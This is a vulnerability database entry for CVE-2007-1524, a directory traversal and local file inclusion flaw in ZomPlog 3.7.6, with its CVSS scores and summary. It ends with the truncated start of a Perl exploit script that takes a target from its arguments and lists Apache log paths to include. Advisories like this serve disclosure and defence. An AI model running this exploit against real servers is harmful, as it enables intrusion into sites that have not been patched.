5
CVSSv2

CVE-2007-1524

Published: 20/03/2007 Updated: 10/10/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and previous versions allows remote malicious users to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.

Vulnerable Product Search on Vulmon Subscribe to Product

zomplog zomplog 3.7.6

Exploits

#Made by Bl0od3r #tech-bl0od3rblogspotcom use IO::Socket; use Switch; { $port = "80"; # $target = @ARGV[0]; # $folder = @ARGV[1]; # @paths=( "/////var/log/httpd/access_log", "/////var/log/httpd/error_log", "/apache/logs/errorlog", "/apache/logs/accesslog", "//apache/logs/errorlog", "//apache/logs/accesslog", ...